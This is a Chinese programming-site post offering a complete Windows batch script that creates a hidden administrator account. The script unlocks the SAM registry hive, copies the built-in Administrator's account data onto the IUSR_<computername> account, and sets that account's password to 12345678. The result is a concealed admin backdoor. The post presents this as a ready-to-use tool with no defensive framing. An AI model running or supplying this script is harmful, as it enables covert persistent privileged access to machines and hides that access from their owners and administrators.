欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

windows 复制隐藏帐号完全批处理

程序员文章站 2022-06-03 17:20:32
复制代码 代码如下:echo off setlocal enabledelayedexpansion echo %computername% echo hkey_local...
复制代码 代码如下:

echo off
setlocal enabledelayedexpansion
echo %computername%
echo hkey_local_machine\sam\sam [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" hkey_local_machine\sam\sam\domains\account\users\names\iusr_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find iusr_%computername% 的对应id
for /f "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" hkey_local_machine\sam\sam\domains\account\users\000001f4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set tmp=%%j
set "tmp=!tmp:000001f4=00000%iusr_id:~0,3%!"
echo !tmp!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo hkey_local_machine\sam\sam [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user iusr_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码